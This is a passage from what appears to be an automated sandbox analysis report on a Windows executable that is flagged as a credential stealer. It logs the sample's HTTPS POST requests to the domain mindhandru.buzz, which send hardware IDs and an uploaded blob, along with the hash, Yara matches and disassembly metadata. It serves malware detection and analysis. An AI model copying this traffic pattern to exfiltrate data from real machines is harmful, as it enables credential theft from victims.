                                                                                                            2024-12-26 11:45:19 UTC12805OUTData Raw: 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 37 36 36 46 37 45 34 44 44 37 43 34 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                            Data Ascii: --3C0DBROOYContent-Disposition: form-data; name="hwid"73766F7E4DD7C48FBEBA0C6A975F1733--3C0DBROOYContent-Disposition: form-data; name="pid"2--3C0DBROOYContent-Disposition: form-data; name="lid"PsFKDg--pablo--3C0DBROOYContent-Disp
                                                                                                            2024-12-26 11:45:27 UTC1128INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:45:27 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=mormn0u7v21k5lgo58e8sn8ak8; expires=Mon, 21 Apr 2025 05:32:05 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z30Ni%2F1G0MrWfNOkNqOoYP6O5T0kXVJbvbRULV1WUFB3OhuKnipHlpNT4LzSrYE4eNuAdDpqFzq1Ku82igOwimbGAY%2FNxslhVufiaurk4ONk72jJgzu%2BwFZYUlQdCs9waPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80d2f04c6878d6-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1811&rtt_var=696&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13735&delivery_rate=1553191&cwnd=147&unsent_bytes=0&cid=77f197f2b12f9dfd&ts=8028&x=0"
                                                                                                            2024-12-26 11:45:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-26 11:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.649760172.67.165.1854435448C:\Users\user\Desktop\XM6cn2uNux.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:45:28 UTC275OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=GGOM7NCR28HL
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 15069
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:45:28 UTC15069OUTData Raw: 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 37 36 36 46 37 45 34 44 44 37 43 34 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a
                                                                                                            Data Ascii: --GGOM7NCR28HLContent-Disposition: form-data; name="hwid"73766F7E4DD7C48FBEBA0C6A975F1733--GGOM7NCR28HLContent-Disposition: form-data; name="pid"2--GGOM7NCR28HLContent-Disposition: form-data; name="lid"PsFKDg--pablo--GGOM7NCR28HL


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.649860172.67.165.1854435448C:\Users\user\Desktop\XM6cn2uNux.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:46:12 UTC281OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=21HZVP8BZL9GZS5N5L
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 19963
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:46:12 UTC15331OUTData Raw: 2d 2d 32 31 48 5a 56 50 38 42 5a 4c 39 47 5a 53 35 4e 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 37 36 36 46 37 45 34 44 44 37 43 34 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 31 48 5a 56 50 38 42 5a 4c 39 47 5a 53 35 4e 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 31 48 5a 56 50 38 42 5a 4c 39 47 5a 53 35 4e 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                            Data Ascii: --21HZVP8BZL9GZS5N5LContent-Disposition: form-data; name="hwid"73766F7E4DD7C48FBEBA0C6A975F1733--21HZVP8BZL9GZS5N5LContent-Disposition: form-data; name="pid"3--21HZVP8BZL9GZS5N5LContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                            2024-12-26 11:46:12 UTC4632OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de
                                                                                                            Data Ascii: +?2+?2+?o?Mp5p_
                                                                                                            2024-12-26 11:47:22 UTC1129INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:47:22 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=gku4cpioudts31ighhpeoiagpk; expires=Mon, 21 Apr 2025 05:34:01 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0T35LOi7ESDNx9kOh74RTstqoHFYEd7RM51gUQmct80KCtIrXXTezL05cfCNnRppjisF6yF%2FvuocliSVjlmzoQECBsi5GgAFC0FAcWAYou56kehpEyDuv%2Fi%2BoMwaBctuss%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80d43cc87a7d02-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1794&rtt_var=688&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20924&delivery_rate=1574123&cwnd=230&unsent_bytes=0&cid=a784f58151514e02&ts=69942&x=0"
                                                                                                            2024-12-26 11:47:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-26 11:47:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:06:45:09
                                                                                                            Start date:26/12/2024
                                                                                                            Path:C:\Users\user\Desktop\XM6cn2uNux.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\XM6cn2uNux.exe"
                                                                                                            Imagebase:0x3d0000
                                                                                                            File size:1'887'232 bytes
                                                                                                            MD5 hash:A3F5C08AC61228829905F46D3E4E9DC5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2777182643.0000000001263000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Non-executed Functions

                                                                                                              Function 01213A30 Relevance: 2.2, Strings: 1, Instructions: 944COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01205000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: [
                                                                                                              • API String ID: 0-784033777
                                                                                                              • Opcode ID: 3a220bfe4577baabc97c4fd9c46310498ff445898ead1b3f8833cd5615232e8f
                                                                                                              • Instruction ID: 457db9374290da28d5dd21d0fc3ab7bfd9cf90402a1bfb3873d0eda53f149489
                                                                                                              • Opcode Fuzzy Hash: 3a220bfe4577baabc97c4fd9c46310498ff445898ead1b3f8833cd5615232e8f
                                                                                                              • Instruction Fuzzy Hash: 7972F26245E3C18FD717CB748C69591BFB4AE2322471E86DFC4C4CF4A3E269994AC722
                                                                                                              Function 01213A30 Relevance: 2.2, Strings: 1, Instructions: 944COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01208000, based on PE: false
                                                                                                              • Associated: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: [
                                                                                                              • API String ID: 0-784033777
                                                                                                              • Opcode ID: 3a220bfe4577baabc97c4fd9c46310498ff445898ead1b3f8833cd5615232e8f
                                                                                                              • Instruction ID: 457db9374290da28d5dd21d0fc3ab7bfd9cf90402a1bfb3873d0eda53f149489
                                                                                                              • Opcode Fuzzy Hash: 3a220bfe4577baabc97c4fd9c46310498ff445898ead1b3f8833cd5615232e8f
                                                                                                              • Instruction Fuzzy Hash: 7972F26245E3C18FD717CB748C69591BFB4AE2322471E86DFC4C4CF4A3E269994AC722
                                                                                                              Function 012330DD Relevance: .8, Instructions: 818COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                              • Associated: 00000000.00000003.3516588604.000000000122D000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0be002053a8864f5e9ee10116c01ba7115c6edccd569bb32bb82ff410c6cb8bd
                                                                                                              • Instruction ID: 107d21315399fe56e2640369cc6f54068e8af4f02ecb0f30aa4ea038f14badff
                                                                                                              • Opcode Fuzzy Hash: 0be002053a8864f5e9ee10116c01ba7115c6edccd569bb32bb82ff410c6cb8bd
                                                                                                              • Instruction Fuzzy Hash: D4E1AAA245E7C19FD7538B348CA56913FB0AE1722471E04EBC4C0CF0B3E26E595ADB62
                                                                                                              Function 012330DD Relevance: .8, Instructions: 818COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0122E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a070254d408d12a98e53aeb0dab8599b0a3c996d379dfb15cf1c3eaeac4ef065
                                                                                                              • Instruction ID: 107d21315399fe56e2640369cc6f54068e8af4f02ecb0f30aa4ea038f14badff
                                                                                                              • Opcode Fuzzy Hash: a070254d408d12a98e53aeb0dab8599b0a3c996d379dfb15cf1c3eaeac4ef065
                                                                                                              • Instruction Fuzzy Hash: D4E1AAA245E7C19FD7538B348CA56913FB0AE1722471E04EBC4C0CF0B3E26E595ADB62
                                                                                                              Function 01214C5D Relevance: .3, Instructions: 321COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01205000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6366fed1ca9a2b15baf991023277d86d8f6d3a51e6d729f694a3f64480d3295e
                                                                                                              • Instruction ID: f901b9026ac0fe9b9465b8a490ee2a5dddb20ba71e08420b6062187ea8e5ffab
                                                                                                              • Opcode Fuzzy Hash: 6366fed1ca9a2b15baf991023277d86d8f6d3a51e6d729f694a3f64480d3295e
                                                                                                              • Instruction Fuzzy Hash: 9EB1EB3001E3D28FC717DF38C9A5696BFB5AF13214B1E02CAD9C08E1A7C2256959C7A6
                                                                                                              Function 01214C5D Relevance: .3, Instructions: 321COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01208000, based on PE: false
                                                                                                              • Associated: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6366fed1ca9a2b15baf991023277d86d8f6d3a51e6d729f694a3f64480d3295e
                                                                                                              • Instruction ID: f901b9026ac0fe9b9465b8a490ee2a5dddb20ba71e08420b6062187ea8e5ffab
                                                                                                              • Opcode Fuzzy Hash: 6366fed1ca9a2b15baf991023277d86d8f6d3a51e6d729f694a3f64480d3295e
                                                                                                              • Instruction Fuzzy Hash: 9EB1EB3001E3D28FC717DF38C9A5696BFB5AF13214B1E02CAD9C08E1A7C2256959C7A6